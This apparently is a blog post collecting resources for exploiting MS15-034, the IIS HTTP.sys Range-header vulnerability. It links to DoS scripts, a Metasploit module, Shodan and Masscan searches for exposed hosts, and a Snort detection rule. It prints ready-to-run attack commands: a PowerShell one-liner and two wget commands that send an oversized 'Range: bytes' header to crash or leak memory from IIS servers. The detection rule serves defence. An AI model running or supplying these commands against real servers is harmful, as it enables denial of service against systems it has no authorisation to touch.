Resource for MS15-034 (HTTP.sys Exploit)


Microsoft Link: https://technet.microsoft.com/library/security/ms15-034
Metasploit: https://github.com/rapid7/metasploit-framework/pull/5150
DoS script in C language:
- http://www.exploit-db.com/exploits/36773/
- https://ghostbin.com/paste/semkg
DoS script in Python:
- http://pastebin.com/raw.php?i=ypURDPc4
- http://pastebin.com/wWGFFZpG
DoS script with Ruby (@John Woods)
- https://github.com/secjohn/ms15-034-checker
Dos with telnet: https://twitter.com/NexusFandom/status/588254994203303937/photo/1
DoS with wget: https://twitter.com/w3bd3vil/status/588339547898941440
Some article: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/
Plugin of IDAPro for diff: https://github.com/joxeankoret/diaphora
Shodan: https://www.shodan.io/search?query=IIS
Discussion: https://github.com/rapid7/metasploit-framework/pull/5150
Memory Leak: https://www.cloudshark.org/captures/0132eb74ecd3
XMLRequest: http://pastebin.com/raw.php?i=SbN55M2H

List service that use HTTP.sys: netsh http show iplisten
Snort Rule for detect: (https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583)
alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)


Nmap script:
https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse

Powershell:
powershell -com {$wr=[Net.WebRequest]::Create( 'http://[ipaddress]/iisstart.htm');$wr.AddRange('bytes' ,0,18446744073709551615);$wr.GetResponse();$wr.close()}

Or
https://gist.github.com/obscuresec/5843025e9fee9353935b

Develop from MS15-034(IIS Killer by Sam): https://samsclass.info/123/proj14/iis-killer.htm

Masscan: http://blog.erratasec.com/2015/04/masscanning-for-ms15-034.html

Exploit in another service by Francisco Falcon (@fdfalcon)





From Youtube(@Matthew Phillips): (https://www.youtube.com/watch?v=BlBXREzsytc&feature=youtu.be)
Make sure you request a valid resource, I found pointing at / didn't work.

wget --header="Range: bytes=18-18446744073709551615"http://192.168.0.28/welcome.png
wget --header="Range: bytes=18-18446744073709551615" http://192.168.0.29/iis-85.png








Source: http://www.r00tsec.com/


Leave a comment

0 Comments.

Leave a Reply

Các bạn có thể viết lời nhận xét cho bài viết, nhưng cần tuân thủ một số quy tắc sau:

» Các bài comment phải nghiêm túc, không dung tục, không spam.
» Nội dung phải liên quan tới chủ đề bài viết.
» Viết bằng tiếng việt có dấu hoặc tiếng Anh. Các comment viết không dấu sẽ bị xóa.
» Hãy để lại tên của bạn khi comment, để tôi có thể dễ dàng trả lời comment của bạn khi cần.

Xin cảm ơn & chúc các bạn tìm được những kiến thức bổ ích khi tình cờ ghé thăm blog này.